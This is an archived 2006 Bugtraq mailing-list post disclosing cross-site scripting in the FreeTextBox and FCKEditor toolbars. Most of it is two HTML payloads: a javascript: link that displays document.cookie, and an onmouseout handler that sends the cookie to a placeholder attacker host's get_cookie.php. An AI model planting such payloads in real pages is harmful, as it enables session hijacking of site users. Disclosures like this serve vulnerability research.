lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: 14 May 2006 17:56:21 -0000
From: bonsite@...mail.com
To: bugtraq@...urityfocus.com
Subject: XSS in FreeTextBox and FCKEditor Basic Toolbar Selection


More information about it on :
http://www.newffr.com/viewtopic.php?forum=26&topic=11683
(in french)

If you don't speak french :
create a web page and write into :
------------------
<html><body><a href="javascript: alert('Cookie:\n'+document.cookie+'\nHave Fun !')">Click here</a></body></html>
------------------

Or :

------------------
<a href="#" onmouseout="javascript: document.location='http://www.hacker.com/get_cookie.php?'+document.cookie">Link</a>
------------------


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ